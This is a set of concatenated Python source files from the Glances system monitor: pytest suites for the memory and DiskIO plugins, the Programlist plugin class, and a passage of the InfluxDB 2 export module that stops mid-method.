                'CRITICAL_LOG',
                'DEFAULT',
                'MAX',
            ]
            assert any(alert.startswith(status) for status in valid_statuses)


class TestMemPluginMsgCurse:
    """Test Memory plugin curse message generation."""

    def test_msg_curse_returns_list(self, mem_plugin):
        """Test that msg_curse returns a list."""
        mem_plugin.update()
        msg = mem_plugin.msg_curse()
        assert isinstance(msg, list)

    def test_msg_curse_format(self, mem_plugin):
        """Test that msg_curse returns properly formatted entries."""
        mem_plugin.update()
        msg = mem_plugin.msg_curse()
        if msg:
            for entry in msg:
                assert isinstance(entry, dict)
                assert 'msg' in entry

    def test_msg_curse_structure(self, mem_plugin):
        """Test msg_curse output structure when stats available."""
        mem_plugin.update()
        stats = mem_plugin.get_raw()
        if stats and not mem_plugin.is_disabled():
            msg = mem_plugin.msg_curse()
            if msg:
                messages = [m.get('msg', '') for m in msg]
                # Should contain MEM when properly configured
                assert len(messages) > 0


class TestMemPluginZFS:
    """Test Memory plugin ZFS integration."""

    def test_zfs_enabled_attribute(self, mem_plugin):
        """Test that zfs_enabled attribute exists."""
        assert hasattr(mem_plugin, 'zfs_enabled')

    def test_available_config_option(self, mem_plugin):
        """Test that available config option exists."""
        assert hasattr(mem_plugin, 'available')


class TestMemPluginExport:
    """Test Memory plugin export functionality."""

    def test_get_export_returns_dict(self, mem_plugin):
        """Test that get_export returns a dict."""
        mem_plugin.update()
        export = mem_plugin.get_export()
        assert isinstance(export, dict)

    def test_export_equals_raw(self, mem_plugin):
        """Test that export equals raw stats by default."""
        mem_plugin.update()
        assert mem_plugin.get_export() == mem_plugin.get_raw()

    def test_export_contains_stats_when_available(self, mem_plugin):
        """Test that export contains expected keys when stats are available."""
        mem_plugin.update()
        export = mem_plugin.get_export()
        if export:  # If there are stats
            assert 'total' in export


class TestMemPluginMMM:
    """Test Memory plugin MMM (Min/Max/Mean) feature.

    The MMM feature automatically tracks minimum, maximum, and mean values
    for fields marked with 'mmm': True in fields_description.
    """

    @staticmethod
    def _force_update(plugin):
        """Force a real update() by expiring the refresh timer.

        The session-scoped glances_stats fixture means the plugin instance is
        shared across tests and, because update() is throttled by a refresh
        timer (default 2s), back-to-back calls can be no-ops. Expiring the
        timer ensures update() really runs so the min/max/mean trackers are fed.
        """
        from glances.timer import Timer

        plugin.refresh_timer = Timer(0)
        plugin.update()

    def test_percent_field_has_mmm_flag(self, mem_plugin):
        """Test that percent field is marked with mmm=True."""
        assert 'percent' in mem_plugin.fields_description
        assert mem_plugin.fields_description['percent'].get('mmm', False) is True

    def test_mmm_fields_initialized(self, mem_plugin):
        """Test that _mmm_fields is initialized for tracking."""
        assert hasattr(mem_plugin, '_mmm_fields')
        assert isinstance(mem_plugin._mmm_fields, dict)
        # percent field should be in mmm_fields
        assert 'percent' in mem_plugin._mmm_fields

    def test_mmm_field_structure(self, mem_plugin):
        """Test that mmm field tracking structure is correct."""
        assert 'percent' in mem_plugin._mmm_fields
        mmm_info = mem_plugin._mmm_fields['percent']
        assert 'values' in mmm_info
        assert 'min' in mmm_info
        assert 'max' in mmm_info
        assert 'unit' in mmm_info
        assert mmm_info['unit'] == 'percent'

    def test_percent_min_max_mean_generated_descriptions(self, mem_plugin):
        """Test that min/max/mean field descriptions are auto-generated."""
        assert 'percent_min' in mem_plugin.fields_description
        assert 'percent_max' in mem_plugin.fields_description
        assert 'percent_mean' in mem_plugin.fields_description

        # Check descriptions exist
        assert 'description' in mem_plugin.fields_description['percent_min']
        assert 'description' in mem_plugin.fields_description['percent_max']
        assert 'description' in mem_plugin.fields_description['percent_mean']

        # Check units match
        assert mem_plugin.fields_description['percent_min']['unit'] == 'percent'
        assert mem_plugin.fields_description['percent_max']['unit'] == 'percent'
        assert mem_plugin.fields_description['percent_mean']['unit'] == 'percent'

    def test_percent_min_max_mean_in_stats_after_update(self, mem_plugin):
        """Test that percent_min, percent_max, and percent_mean appear in stats after update."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        assert 'percent' in stats
        assert 'percent_min' in stats, "percent_min missing from stats"
        assert 'percent_max' in stats, "percent_max missing from stats"
        assert 'percent_mean' in stats, "percent_mean missing from stats"

    def test_percent_min_max_mean_are_numeric(self, mem_plugin):
        """Test that percent_min, percent_max, and percent_mean are numeric."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        assert isinstance(stats['percent_min'], (int, float))
        assert isinstance(stats['percent_max'], (int, float))
        assert isinstance(stats['percent_mean'], (int, float))

    def test_percent_min_max_mean_in_valid_range(self, mem_plugin):
        """Test that percent_min, percent_max, and percent_mean are between 0-100."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        assert 0 <= stats['percent_min'] <= 100
        assert 0 <= stats['percent_max'] <= 100
        assert 0 <= stats['percent_mean'] <= 100

    def test_min_less_than_or_equal_max(self, mem_plugin):
        """Test that percent_min <= percent_max."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        assert stats['percent_min'] <= stats['percent_max']

    def test_mean_between_min_and_max(self, mem_plugin):
        """Test that percent_mean falls between percent_min and percent_max."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        assert stats['percent_min'] <= stats['percent_mean'] <= stats['percent_max']

    def test_current_percent_within_bounds(self, mem_plugin):
        """Test that current percent falls between min and max."""
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()
        # After multiple updates, current should fall within observed bounds
        assert stats['percent_min'] <= stats['percent'] <= stats['percent_max']

    def test_mmm_fields_in_api_output(self, mem_plugin):
        """Test that MMM fields are exposed via get_api()."""
        self._force_update(mem_plugin)
        api_data = mem_plugin.get_api()
        assert 'percent_min' in api_data
        assert 'percent_max' in api_data
        assert 'percent_mean' in api_data

    def test_mmm_fields_in_json_output(self, mem_plugin):
        """Test that MMM fields are in JSON output."""
        self._force_update(mem_plugin)
        stats_json = mem_plugin.get_stats()
        parsed = json.loads(stats_json)
        assert 'percent_min' in parsed
        assert 'percent_max' in parsed
        assert 'percent_mean' in parsed

    def test_mmm_fields_in_export_output(self, mem_plugin):
        """Test that MMM fields are in export output."""
        self._force_update(mem_plugin)
        export = mem_plugin.get_export()
        assert 'percent_min' in export
        assert 'percent_max' in export
        assert 'percent_mean' in export

    def test_mmm_history_accumulation(self, mem_plugin):
        """Test that MMM tracking accumulates history correctly."""
        # Force multiple updates to build history
        from glances.timer import Timer

        for _ in range(3):
            mem_plugin.refresh_timer = Timer(0)
            mem_plugin.update()

        # Check that history has accumulated
        mmm_info = mem_plugin._mmm_fields['percent']
        # After 3 updates, we should have at least 3 values in history
        assert len(mmm_info['values']) >= 1

    def test_mmm_min_max_monotonic(self, mem_plugin):
        """Test that min only decreases (or stays) and max only increases (or stays)."""
        from glances.timer import Timer

        prev_min = None
        prev_max = None

        for _ in range(3):
            mem_plugin.refresh_timer = Timer(0)
            mem_plugin.update()
            stats = mem_plugin.get_raw()

            if prev_min is not None:
                # min should never increase, max should never decrease
                assert stats['percent_min'] <= prev_min or prev_min is None
                assert stats['percent_max'] >= prev_max or prev_max is None

            prev_min = stats['percent_min']
            prev_max = stats['percent_max']

    def test_mmm_history_limit(self, mem_plugin):
        """Test that MMM history respects the size limit."""
        mmm_info = mem_plugin._mmm_fields['percent']

        # The limit should be set to a reasonable value (28800 by default)
        max_history_size = 28800

        # After a single update, history should be small
        from glances.timer import Timer

        mem_plugin.refresh_timer = Timer(0)
        mem_plugin.update()

        # History should not exceed the limit
        assert len(mmm_info['values']) <= max_history_size

    def test_mmm_fields_with_multiple_updates(self, mem_plugin):
        """Test MMM tracking across multiple updates."""
        from glances.timer import Timer

        # Perform multiple updates
        for i in range(5):
            mem_plugin.refresh_timer = Timer(0)
            mem_plugin.update()

        stats = mem_plugin.get_raw()

        # All MMM fields should be present
        assert 'percent_min' in stats
        assert 'percent_max' in stats
        assert 'percent_mean' in stats

        # Values should be relative to each other
        assert stats['percent_min'] <= stats['percent'] <= stats['percent_max']
        assert stats['percent_min'] <= stats['percent_mean'] <= stats['percent_max']

    def test_mmm_decorator_applied(self, mem_plugin):
        """Test that the _manage_mmm decorator is properly applied to update method."""
        # The update method should have the decorator applied
        # We can verify this by checking that MMM fields appear in stats
        self._force_update(mem_plugin)
        stats = mem_plugin.get_raw()

        # If decorator is applied correctly, these fields should exist
        assert 'percent_min' in stats
        assert 'percent_max' in stats
        assert 'percent_mean' in stats



#!/usr/bin/env python
#
# Glances - An eye on your system
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Tests for the DiskIO plugin."""

import json
import time

import pytest


@pytest.fixture
def diskio_plugin(glances_stats):
    """Return the DiskIO plugin instance from glances_stats."""
    return glances_stats.get_plugin('diskio')


class TestDiskioPluginBasics:
    """Test basic DiskIO plugin functionality."""

    def test_plugin_name(self, diskio_plugin):
        """Test plugin name is correctly set."""
        assert diskio_plugin.plugin_name == 'diskio'

    def test_plugin_is_enabled(self, diskio_plugin):
        """Test that the plugin is enabled by default."""
        assert diskio_plugin.is_enabled() is True

    def test_display_curse_enabled(self, diskio_plugin):
        """Test that curse display is enabled."""
        assert diskio_plugin.display_curse is True

    def test_get_key_returns_disk_name(self, diskio_plugin):
        """Test that get_key returns disk_name."""
        assert diskio_plugin.get_key() == 'disk_name'

    def test_history_items_defined(self, diskio_plugin):
        """Test that history items are properly defined."""
        items = diskio_plugin.get_items_history_list()
        assert items is not None
        item_names = [item['name'] for item in items]
        assert 'read_bytes_rate_per_sec' in item_names
        assert 'write_bytes_rate_per_sec' in item_names


class TestDiskioPluginUpdate:
    """Test DiskIO plugin update functionality."""

    def test_update_returns_list(self, diskio_plugin):
        """Test that update returns a list."""
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        assert isinstance(stats, list)

    def test_each_disk_has_name(self, diskio_plugin):
        """Test that each disk entry has a name."""
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'disk_name' in disk

    def test_read_write_bytes_present(self, diskio_plugin):
        """Test that read_bytes and write_bytes are present."""
        diskio_plugin.update()
        time.sleep(0.1)
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'read_bytes' in disk
            assert 'write_bytes' in disk

    def test_bytes_values_non_negative(self, diskio_plugin):
        """Test that byte values are non-negative."""
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            if 'read_bytes' in disk and disk['read_bytes'] is not None:
                assert disk['read_bytes'] >= 0
            if 'write_bytes' in disk and disk['write_bytes'] is not None:
                assert disk['write_bytes'] >= 0


class TestDiskioPluginRateCalculation:
    """Test DiskIO plugin rate calculation."""

    def test_rate_fields_after_two_updates(self, diskio_plugin):
        """Test that rate fields are populated after two updates."""
        diskio_plugin.update()
        time.sleep(0.2)
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'read_bytes_rate_per_sec' in disk or 'read_bytes' in disk
            assert 'write_bytes_rate_per_sec' in disk or 'write_bytes' in disk


class TestDiskioPluginLatency:
    """Test DiskIO plugin latency calculation."""

    def test_latency_fields_present(self, diskio_plugin):
        """Test that latency fields are present after update."""
        diskio_plugin.update()
        time.sleep(0.1)
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'read_latency' in disk
            assert 'write_latency' in disk

    def test_latency_values_non_negative(self, diskio_plugin):
        """Test that latency values are non-negative."""
        diskio_plugin.update()
        time.sleep(0.1)
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            if 'read_latency' in disk and disk['read_latency'] is not None:
                assert disk['read_latency'] >= 0
            if 'write_latency' in disk and disk['write_latency'] is not None:
                assert disk['write_latency'] >= 0


class TestDiskioPluginCounters:
    """Test DiskIO plugin read/write counters."""

    def test_read_count_present(self, diskio_plugin):
        """Test that read_count is present."""
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'read_count' in disk

    def test_write_count_present(self, diskio_plugin):
        """Test that write_count is present."""
        diskio_plugin.update()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            assert 'write_count' in disk


class TestDiskioPluginViews:
    """Test DiskIO plugin views functionality."""

    def test_update_views_creates_views(self, diskio_plugin):
        """Test that update_views creates views dictionary."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        views = diskio_plugin.get_views()
        assert isinstance(views, dict)

    def test_views_keyed_by_disk(self, diskio_plugin):
        """Test that views are keyed by disk name."""
        diskio_plugin.update()
        time.sleep(0.1)
        diskio_plugin.update()
        diskio_plugin.update_views()
        views = diskio_plugin.get_views()
        stats = diskio_plugin.get_raw()
        for disk in stats:
            if disk['disk_name'] in views:
                assert isinstance(views[disk['disk_name']], dict)


class TestDiskioPluginJSON:
    """Test DiskIO plugin JSON serialization."""

    def test_get_stats_returns_json(self, diskio_plugin):
        """Test that get_stats returns valid JSON."""
        diskio_plugin.update()
        stats_json = diskio_plugin.get_stats()
        parsed = json.loads(stats_json)
        assert isinstance(parsed, list)

    def test_json_preserves_disk_data(self, diskio_plugin):
        """Test that JSON output preserves disk data."""
        diskio_plugin.update()
        stats_json = diskio_plugin.get_stats()
        parsed = json.loads(stats_json)
        for disk in parsed:
            assert 'disk_name' in disk


class TestDiskioPluginHistory:
    """Test DiskIO plugin history functionality."""

    def test_history_enable(self, diskio_plugin):
        """Test that history can be enabled."""
        assert diskio_plugin.history_enable() is not None


class TestDiskioPluginReset:
    """Test DiskIO plugin reset functionality."""

    def test_reset_clears_stats(self, diskio_plugin):
        """Test that reset clears stats."""
        diskio_plugin.update()
        diskio_plugin.reset()
        stats = diskio_plugin.get_raw()
        assert stats == diskio_plugin.get_init_value()

    def test_reset_views(self, diskio_plugin):
        """Test that reset_views clears views."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        diskio_plugin.reset_views()
        assert diskio_plugin.get_views() == {}


class TestDiskioPluginFieldsDescription:
    """Test DiskIO plugin fields description."""

    def test_fields_description_exists(self, diskio_plugin):
        """Test that fields_description is defined."""
        assert diskio_plugin.fields_description is not None

    def test_mandatory_fields_described(self, diskio_plugin):
        """Test that mandatory fields have descriptions."""
        mandatory_fields = ['disk_name', 'read_bytes', 'write_bytes']
        for field in mandatory_fields:
            assert field in diskio_plugin.fields_description

    def test_rate_fields_described(self, diskio_plugin):
        """Test that rate-enabled fields have rate flag."""
        rate_fields = ['read_bytes', 'write_bytes', 'read_count', 'write_count']
        for field in rate_fields:
            if field in diskio_plugin.fields_description:
                assert diskio_plugin.fields_description[field].get('rate') is True

    def test_latency_fields_described(self, diskio_plugin):
        """Test that latency fields are described."""
        latency_fields = ['read_latency', 'write_latency']
        for field in latency_fields:
            assert field in diskio_plugin.fields_description


class TestDiskioPluginConfiguration:
    """Test DiskIO plugin configuration options."""

    def test_hide_zero_attribute(self, diskio_plugin):
        """Test that hide_zero attribute exists."""
        assert hasattr(diskio_plugin, 'hide_zero')

    def test_hide_zero_fields_defined(self, diskio_plugin):
        """Test that hide_zero_fields is defined."""
        assert hasattr(diskio_plugin, 'hide_zero_fields')
        assert isinstance(diskio_plugin.hide_zero_fields, list)

    def test_hide_threshold_bytes_attribute(self, diskio_plugin):
        """Test that hide_threshold_bytes attribute exists."""
        assert hasattr(diskio_plugin, 'hide_threshold_bytes')


class TestDiskioPluginMsgCurse:
    """Test DiskIO plugin curse message generation."""

    def test_msg_curse_returns_list(self, diskio_plugin):
        """Test that msg_curse returns a list."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        msg = diskio_plugin.msg_curse(max_width=80)
        assert isinstance(msg, list)

    def test_msg_curse_empty_without_max_width(self, diskio_plugin):
        """Test that msg_curse returns empty without max_width."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        msg = diskio_plugin.msg_curse()
        assert isinstance(msg, list)

    def test_msg_curse_with_max_width(self, diskio_plugin):
        """Test that msg_curse works with max_width."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        msg = diskio_plugin.msg_curse(max_width=80)
        assert isinstance(msg, list)


class TestDiskioPluginSorting:
    """Test DiskIO plugin sorting functionality."""

    def test_sorted_stats_returns_list(self, diskio_plugin):
        """Test that sorted_stats returns a list."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        sorted_stats = diskio_plugin.sorted_stats()
        assert isinstance(sorted_stats, list)

    def test_sorted_stats_preserves_count(self, diskio_plugin):
        """Test that sorted_stats preserves disk count."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        raw_count = len(diskio_plugin.get_raw())
        sorted_count = len(diskio_plugin.sorted_stats())
        assert raw_count == sorted_count


class TestDiskioPluginExport:
    """Test DiskIO plugin export functionality."""

    def test_get_export_returns_list(self, diskio_plugin):
        """Test that get_export returns a list."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        export = diskio_plugin.get_export()
        assert isinstance(export, list)

    def test_export_equals_raw(self, diskio_plugin):
        """Test that export equals raw stats by default."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        assert diskio_plugin.get_export() == diskio_plugin.get_raw()


class TestDiskioPluginAlerts:
    """Test DiskIO plugin alert functionality."""

    def test_views_have_decoration(self, diskio_plugin):
        """Test that disk views have decoration after update."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        time.sleep(0.1)
        diskio_plugin.update()
        diskio_plugin.update_views()
        views = diskio_plugin.get_views()
        stats = diskio_plugin.get_raw()

        for disk in stats:
            disk_name = disk['disk_name']
            if disk_name in views and 'read_bytes' in views[disk_name]:
                assert 'decoration' in views[disk_name]['read_bytes']


class TestDiskioPluginAlias:
    """Test DiskIO plugin alias functionality."""

    def test_alias_field_may_be_present(self, diskio_plugin):
        """Test that alias field may be present for disks."""
        diskio_plugin.update()
        diskio_plugin.update_views()
        stats = diskio_plugin.get_raw()
        # Alias is optional, so just verify the field handling works
        for disk in stats:
            if 'alias' in disk:
                assert disk['alias'] is None or isinstance(disk['alias'], str)



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2024 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""Program list plugin."""

import copy

from glances.plugins.processlist import ProcesslistPlugin
from glances.processes import glances_processes

# Fields description
# description: human readable description
# short_name: shortname to use un UI
# unit: unit type
# rate: if True then compute and add *_gauge and *_rate_per_is fields
# min_symbol: Auto unit should be used if value > than 1 'X' (K, M, G)...
fields_description = {
    'name': {
        'description': 'Process name',
        'unit': 'string',
    },
    'cmdline': {
        'description': 'Command line with arguments',
        'unit': 'list',
    },
    'username': {
        'description': 'Process owner',
        'unit': 'string',
    },
    'nprocs': {
        'description': 'Number of children processes',
        'unit': 'number',
    },
    'num_threads': {
        'description': 'Number of threads',
        'unit': 'number',
    },
    'cpu_percent': {
        'description': 'Process CPU consumption',
        'unit': 'percent',
    },
    'memory_percent': {
        'description': 'Process memory consumption',
        'unit': 'percent',
    },
    'memory_info': {
        'description': 'Process memory information (dict with rss, vms, shared, text, lib, data, dirty keys)',
        'unit': 'byte',
    },
    'status': {
        'description': 'Process status',
        'unit': 'string',
    },
    'nice': {
        'description': 'Process nice value',
        'unit': 'number',
    },
    'cpu_times': {
        'description': 'Process CPU times (dict with user, system, iowait keys)',
        'unit': 'second',
    },
    'gids': {
        'description': 'Process group IDs (dict with real, effective, saved keys)',
        'unit': 'number',
    },
    'io_counters': {
        'description': 'Process IO counters (list with read_count, write_count, read_bytes, write_bytes, io_tag keys)',
        'unit': 'byte',
    },
}


class ProgramlistPlugin(ProcesslistPlugin):
    """Glances' processes plugin.

    stats is a list
    """

    # Default list of processes stats to be grabbed / displayed
    # Can be altered by glances_processes.disable_stats
    enable_stats = [
        'cpu_percent',
        'memory_percent',
        'memory_info',  # vms and rss
        'nprocs',
        'username',
        'cpu_times',
        'num_threads',
        'nice',
        'status',
        'io_counters',  # ior and iow
        'cmdline',
    ]

    # Define the header layout of the processes list columns
    layout_header = {
        'cpu': '{:<6} ',
        'mem': '{:<5} ',
        'virt': '{:<5} ',
        'res': '{:<5} ',
        'nprocs': '{:>7} ',
        'user': '{:<10} ',
        'time': '{:>8} ',
        'thread': '{:<3} ',
        'nice': '{:>3} ',
        'status': '{:>1} ',
        'ior': '{:>4} ',
        'iow': '{:<4} ',
        'command': '{} {}',
    }

    # Define the stat layout of the processes list columns
    layout_stat = {
        'cpu': '{:<6.1f}',
        'cpu_no_digit': '{:<6.0f}',
        'mem': '{:<5.1f} ',
        'virt': '{:<5} ',
        'res': '{:<5} ',
        'nprocs': '{:>7} ',
        'user': '{:<10} ',
        'time': '{:>8} ',
        'thread': '{:<3} ',
        'nice': '{:>3} ',
        'status': '{:>1} ',
        'ior': '{:>4} ',
        'iow': '{:<4} ',
        'command': '{}',
        'name': '[{}]',
    }

    def __init__(self, args=None, config=None):
        """Init the plugin."""
        super().__init__(args=args, config=config)

    def load(self, args, config):
        """Load already done in processlist"""
        pass

    def get_key(self):
        """Return the key of the list."""
        return 'name'

    def update(self):
        """Update processes stats using the input method."""
        # Update the stats
        if self.input_method == 'local':
            # Update stats using the standard system lib
            # Note: Update is done in the processcount plugin
            # Just return the result
            stats = glances_processes.get_list(as_programs=True)
        else:
            stats = self.get_init_value()

        # Get the max values (dict)
        # Use Deep copy to avoid change between update and display
        self.max_values = copy.deepcopy(glances_processes.max_values())

        # Update the stats
        self.stats = stats

        return self.stats

    def get_api(self):
        """Return the sorted processes list for the API."""
        return glances_processes.get_list(sorted=True, as_programs=True)

    def _get_process_curses_nprocs(self, p, selected, args):
        """Return process NPROCS curses"""
        # Display the number of children processes
        msg = self.layout_stat['nprocs'].format(p['nprocs'])
        return self.curse_add_line(msg)

    def _cpu_header_msg(self, args):
        """Return the CPU column header, depending on Irix mode and the number of cores."""
        if args.disable_irix and 0 < self.nb_log_core < 10:
            return self.layout_header['cpu'].format('CPU%/' + str(self.nb_log_core))
        if args.disable_irix and self.nb_log_core:
            return self.layout_header['cpu'].format('CPU%/C')
        return self.layout_header['cpu'].format('CPU%')

    def _header_columns(self, args):
        """Return the ordered list of header columns as (stat, msg, sort_key, options) tuples.

        A stat may appear more than once (one tuple per displayed column).
        sort_key is the process_sort_key that highlights the column, or None if not sortable.
        options are extra keyword arguments passed to curse_add_line.
        """
        if args.is_standalone and not args.disable_cursor:
            shortkey = "('k' to kill)"
        else:
            shortkey = ""
        io_options = {'optional': True, 'additional': True}
        return [
            ('cpu_percent', self._cpu_header_msg(args), 'cpu_percent', {}),
            ('memory_percent', self.layout_header['mem'].format('MEM%'), 'memory_percent', {}),
            ('memory_info', self.layout_header['virt'].format('VIRT'), None, {'optional': True}),
            ('memory_info', self.layout_header['res'].format('RES'), None, {'optional': True}),
            ('nprocs', self.layout_header['nprocs'].format('NPROCS'), None, {}),
            ('username', self.layout_header['user'].format('USER'), 'username', {}),
            ('cpu_times', self.layout_header['time'].format('TIME+'), 'cpu_times', {'optional': True}),
            ('num_threads', self.layout_header['thread'].format('THR'), None, {}),
            ('nice', self.layout_header['nice'].format('NI'), None, {}),
            ('status', self.layout_header['status'].format('S'), None, {}),
            ('io_counters', self.layout_header['ior'].format('R/s'), 'io_counters', io_options),
            ('io_counters', self.layout_header['iow'].format('W/s'), 'io_counters', io_options),
            ('cmdline', self.layout_header['command'].format("Programs", shortkey), 'name', {}),
        ]

    def _msg_curse_header(self, ret, process_sort_key, args=None):
        """Build the header and add it to the ret dict."""
        display_stats = [i for i in self.enable_stats if i not in glances_processes.disable_stats]

        for stat, msg, sort_key, options in self._header_columns(args):
            if stat not in display_stats:
                continue
            decoration = 'SORT' if sort_key is not None and process_sort_key == sort_key else 'DEFAULT'
            ret.append(self.curse_add_line(msg, decoration, **options))

    def _msg_curse_sum(self, ret, sep_char='_', mmm=None, args=None):
        """
        Build the sum message (only when filter is on) and add it to the ret dict.

        :param ret: list of string where the message is added
        :param sep_char: define the line separation char
        :param mmm: display min, max, mean or current (if mmm=None)
        :param args: Glances args
        """
        ret.append(self.curse_new_line())
        if mmm is None:
            ret.append(self.curse_add_line(sep_char * 69))
            ret.append(self.curse_new_line())
        # CPU percent sum
        msg = ' '
        msg += self.layout_stat['cpu'].format(self._sum_stats('cpu_percent', mmm=mmm))
        ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm)))
        # MEM percent sum
        msg = self.layout_stat['mem'].format(self._sum_stats('memory_percent', mmm=mmm))
        ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm)))
        # VIRT and RES memory sum
        if (
            'memory_info' in self.stats[0]
            and self.stats[0]['memory_info'] is not None
            and self.stats[0]['memory_info'] != ''
        ):
            # VMS
            msg = self.layout_stat['virt'].format(
                self.auto_unit(self._sum_stats('memory_info', sub_key='vms', mmm=mmm), low_precision=False)
            )
            ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm), optional=True))
            # RSS
            msg = self.layout_stat['res'].format(
                self.auto_unit(self._sum_stats('memory_info', sub_key='rss', mmm=mmm), low_precision=False)
            )
            ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm), optional=True))
        else:
            msg = self.layout_header['virt'].format('')
            ret.append(self.curse_add_line(msg))
            msg = self.layout_header['res'].format('')
            ret.append(self.curse_add_line(msg))
        # PID
        msg = self.layout_header['nprocs'].format('')
        ret.append(self.curse_add_line(msg))
        # USER
        msg = self.layout_header['user'].format('')
        ret.append(self.curse_add_line(msg))
        # TIME+
        msg = self.layout_header['time'].format('')
        ret.append(self.curse_add_line(msg, optional=True))
        # THREAD
        msg = self.layout_header['thread'].format('')
        ret.append(self.curse_add_line(msg))
        # NICE
        msg = self.layout_header['nice'].format('')
        ret.append(self.curse_add_line(msg))
        # STATUS
        msg = self.layout_header['status'].format('')
        ret.append(self.curse_add_line(msg))
        # IO read/write
        if 'io_counters' in self.stats[0] and mmm is None:
            # IO read
            io_rs = int(
                (self._sum_stats('io_counters', 0) - self._sum_stats('io_counters', sub_key=2, mmm=mmm))
                / self.stats[0]['time_since_update']
            )
            if io_rs == 0:
                msg = self.layout_stat['ior'].format('0')
            else:
                msg = self.layout_stat['ior'].format(self.auto_unit(io_rs, low_precision=True))
            ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm), optional=True, additional=True))
            # IO write
            io_ws = int(
                (self._sum_stats('io_counters', 1) - self._sum_stats('io_counters', sub_key=3, mmm=mmm))
                / self.stats[0]['time_since_update']
            )
            if io_ws == 0:
                msg = self.layout_stat['iow'].format('0')
            else:
                msg = self.layout_stat['iow'].format(self.auto_unit(io_ws, low_precision=True))
            ret.append(self.curse_add_line(msg, decoration=self._mmm_deco(mmm), optional=True, additional=True))
        else:
            msg = self.layout_header['ior'].format('')
            ret.append(self.curse_add_line(msg, optional=True, additional=True))
            msg = self.layout_header['iow'].format('')
            ret.append(self.curse_add_line(msg, optional=True, additional=True))
        if mmm is None:
            msg = '< {}'.format('current')
            ret.append(self.curse_add_line(msg, optional=True))
        else:
            msg = f'< {mmm}'
            ret.append(self.curse_add_line(msg, optional=True))
            msg = '(\'M\' to reset)'
            ret.append(self.curse_add_line(msg, optional=True))



#
# This file is part of Glances.
#
# SPDX-FileCopyrightText: 2022 Nicolas Hennion <nicolas@nicolargo.com>
#
# SPDX-License-Identifier: LGPL-3.0-only
#

"""InfluxDB (from to InfluxDB 1.8+ to <3.0) interface class."""

import sys
from platform import node

from influxdb_client import InfluxDBClient, WriteOptions

from glances.exports.export import GlancesExport
from glances.logger import logger


class Export(GlancesExport):
    """This class manages the InfluxDB export module."""

    def __init__(self, config=None, args=None):
        """Init the InfluxDB export IF."""
        super().__init__(config=config, args=args)

        # Mandatory configuration keys (additional to host and port)
        self.org = None
        self.bucket = None
        self.token = None

        # Optional configuration keys
        self.protocol = "http"
        self.prefix = None
        self.tags = None
        self.hostname = None
        self.interval = None

        # Load the InfluxDB configuration file
        self.export_enable = self.load_conf(
            "influxdb2",
            mandatories=["host", "port", "user", "password", "org", "bucket", "token"],
            options=["protocol", "prefix", "tags", "interval"],
        )
        if not self.export_enable:
            exit("Missing influxdb2 config")

        # Interval between two exports (in seconds)
        if self.interval is None:
            self.interval = 0
        try:
            self.interval = int(self.interval)
        except ValueError:
            logger.warning("InfluxDB export interval is not an integer, use default value")
            self.interval = 0
        # and should be set to the Glances refresh time if the value is 0
        self.interval = self.interval if self.interval > 0 else self.args.time
        logger.debug(f"InfluxDB export interval is set to {self.interval} seconds")

        # The hostname is always add as a tag
        self.hostname = node().split(".")[0]

        # Init the InfluxDB client
        self.client = self.init()

    def init(self):
        """Init the connection to the InfluxDB server."""
        if not self.export_enable:
            return None

        url = f"{self.protocol}://{self.host}:{self.port}"
        try:
            # See docs: https://influxdb-client.readthedocs.io/en/stable/api.html#influxdbclient
            client = InfluxDBClient(
                url=url,
                enable_gzip=False,
                verify_ssl=False,
                org=self.org,
                token=self.token,
            )
        except Exception as e:
            logger.critical(f"Cannot connect to InfluxDB server '{url}' ({e})")
            sys.exit(2)
        else:
            logger.info(f"Connected to InfluxDB server version {client.health().version} ({client.health().message})")

        # Create the write client
        return client.write_api(
            write_options=WriteOptions(
                batch_size=500,
                flush_interval=self.interval * 1000,
                jitter_interval=2000,
                retry_interval=5000,
                max_retries=5,
                max_retry_delay=30000,
                exponential_base=2,
            )
        )

    def export(self, name, columns, points):
        """Write the points to the InfluxDB server."""
        # Manage prefix
        if self.prefix is not None:
            name = self.prefix + "." + name
        # Write input to the InfluxDB database
        if not points:
            logger.debug(f"Cannot export empty {name} stats to InfluxDB")
        else:
            try:
                self.client.write(
                    self.bucket,
                    self.org,
                    self.normalize_for_influxdb(name, columns, points),
                    time_precision="s",
                )
            except Exception as e:
                # Log level set to warning instead of error (see: issue #1561)
                logger.warning(f"Cannot export {name} stats to InfluxDB ({e})")
            else:
